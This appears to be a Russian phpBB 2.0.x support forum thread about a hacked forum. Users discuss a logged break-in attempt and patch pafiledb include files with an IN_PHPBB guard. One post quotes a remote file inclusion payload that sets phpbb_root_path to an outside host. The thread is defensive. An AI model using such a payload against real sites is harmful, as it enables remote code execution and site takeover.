Взломали форум

Проблемы с установкой или работой phpBB 2.0.x? Ищите ответы здесь!
Gosudar
phpBB 2.0.0
Сообщения: 227
Стаж: 19 лет 9 месяцев

Сообщение Gosudar »

Да кстати, я попытки взлома пишу в лог файл
вот один пыталяся :
?phpbb_root_path=http://godsteam.org/echo3?
сволочь пасс хотел.
godsteam.org настучать что ли на них?
Аватара пользователя
Rayden
Former team member
Сообщения: 3739
Стаж: 19 лет 10 месяцев
Поблагодарили: 3 раза

Сообщение Rayden »

Я думаю, если есть возмоность/желание - обязательно надо. Такие вещи не должны безнаказанно проходить.
phpBB2 FAQ
phpBB3 FAQ
Gosudar
phpBB 2.0.0
Сообщения: 227
Стаж: 19 лет 9 месяцев

Сообщение Gosudar »

deleted
Последний раз редактировалось Gosudar 08.10.2007 11:49, всего редактировалось 1 раз.
Аватара пользователя
Rayden
Former team member
Сообщения: 3739
Стаж: 19 лет 10 месяцев
Поблагодарили: 3 раза

Сообщение Rayden »

Портянку убери, запрещено правилами.
phpBB2 FAQ
phpBB3 FAQ
Аватара пользователя
Siava
Поддержка
Поддержка
Сообщения: 5426
Стаж: 20 лет 3 месяца
Откуда: Питер
Благодарил (а): 177 раз
Поблагодарили: 749 раз

Сообщение Siava »

Rayden
Какая ж это портянка?
Еще одно нарушение правил и будете забанены. © Mr. Anderson
Ты очистил кеш? © Sheer
https://siava.ru (phpbb 2.0.x 3.5.x)
Аватара пользователя
Rayden
Former team member
Сообщения: 3739
Стаж: 19 лет 10 месяцев
Поблагодарили: 3 раза

Сообщение Rayden »

Больше 25 строк.
phpBB2 FAQ
phpBB3 FAQ
Xpert
phpBB Guru
phpBB Guru
Сообщения: 5484
Стаж: 21 год 1 месяц
Поблагодарили: 2 раза

Сообщение Xpert »

Есть аналогичные дыры которые тут лечили, применительно к KB Mod, который тоже является частью портала.
Эксперт - это человек, который избегает мелких ошибок на пути к грандиозному провалу.
Любая более-менее сложная задача имеет несколько простых, изящных, лёгких для понимания неправильных решений
Jovani
phpBB 2.0.5
Сообщения: 477
Стаж: 21 год

Сообщение Jovani »

По идее, достаточно, сделать проверку как в других аналогичных файлах, то есть, в начале файла, после копирайтов, добавить:

Код: Выделить всё

if ( !defined('IN_PHPBB') )
{
	die("Hacking attempt");
}
Кстати, от греха подальше, аналогично сделать с другими файлами в этой директории pafiledb/includes ;)
Аватара пользователя
Neonaft
phpBB 1.4.4
Сообщения: 114
Стаж: 19 лет 2 месяца

Сообщение Neonaft »

А вот собственно вопрос, в каких файлах нужно писать подобный код?
Неужели прям во всех или есть предпочтения?
tematika
phpBB 1.2.0
Сообщения: 14
Стаж: 18 лет 4 месяца

Сообщение tematika »

А чем это опасно? На одном форуме вылазит Hacking attempt! На другом ничего.
Jovani
phpBB 2.0.5
Сообщения: 477
Стаж: 21 год

Сообщение Jovani »

Neonaft писал(а):А вот собственно вопрос, в каких файлах нужно писать подобный код?
Неужели прям во всех или есть предпочтения?
В тех, которые не должны исполняться отдельно от phpbb, то есть в "подключаемых".

Вернуться в «Поддержка phpBB 2.0.x»